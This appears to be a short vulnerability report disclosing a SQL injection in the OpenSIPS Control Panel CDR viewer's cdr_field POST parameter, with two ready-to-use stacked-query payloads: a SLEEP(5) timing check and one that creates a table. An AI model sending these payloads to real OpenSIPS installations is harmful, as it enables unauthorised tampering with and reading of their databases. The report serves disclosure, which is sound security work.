Opensips CP <=9.3.2 : CDR Search Action SQL Injection #215
Description
Hello,
PATH:
/cp/tools/system/cdrviewer/cdrviewer.php
PARAM:
cdr_field (duration)
METHOD:
POST
INJECTION CHECK:
Payload: cdr_field=duration;SELECT SLEEP(5)#&search_regexp=0&start_year=2022&start_month=06&start_day=02&start_hour=23&start_minute=07&start_second=07&end_year=2022&end_month=06&end_day=02&end_hour=23&end_minute=07&end_second=07&export=Export
ARBITRARY COMMAND:
cdr_field=duration;CREATE TABLE Injection (id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,firstname VARCHAR(30) NOT NULL,lastname VARCHAR(30) NOT NULL,email VARCHAR(50),reg_date TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP)#&search_regexp=0&start_year=2022&start_month=06&start_day=02&start_hour=23&start_minute=07&start_second=07&end_year=2022&end_month=06&end_day=02&end_hour=23&end_minute=07&end_second=07&export=Export